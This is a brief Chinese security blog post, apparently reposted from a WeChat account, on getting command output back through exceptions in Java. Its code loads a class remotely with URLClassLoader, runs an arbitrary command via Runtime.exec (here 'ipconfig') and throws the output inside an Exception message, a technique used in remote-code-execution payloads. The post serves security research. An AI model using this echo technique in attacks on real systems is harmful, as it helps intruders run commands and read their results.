扫一扫关注公众号,长期致力于安全研究
水一篇文章....大佬勿喷....好久没更了
首先来看如下代码,其构造传入字符串,就可以作为命令执行。与之不同的是最后回显信息通过了throw抛出异常的方式来显示
public URLClassTest(String name) throws Exception {
Process process = Runtime.getRuntime().exec(name);
InputStream stream = process.getInputStream();
InputStreamReader inputStreamReader = new InputStreamReader(stream,Charset.forName("gbk"));
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuffer buf = new StringBuffer();
String line = null;
while( (line = bufferedReader.readLine())!=null){
buf.append(line+"n");
}
throw new Exception(buf.toString());
}
public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
URLClassLoader classLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1/")});
Class cls = classLoader.loadClass("URLClassTest");
Constructor obj = cls.getDeclaredConstructor(String.class);
obj.newInstance("ipconfig");
}
下方扫一下扫,即可关注
原文始发于微信公众号(安全族):JAVA异常回显研究
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论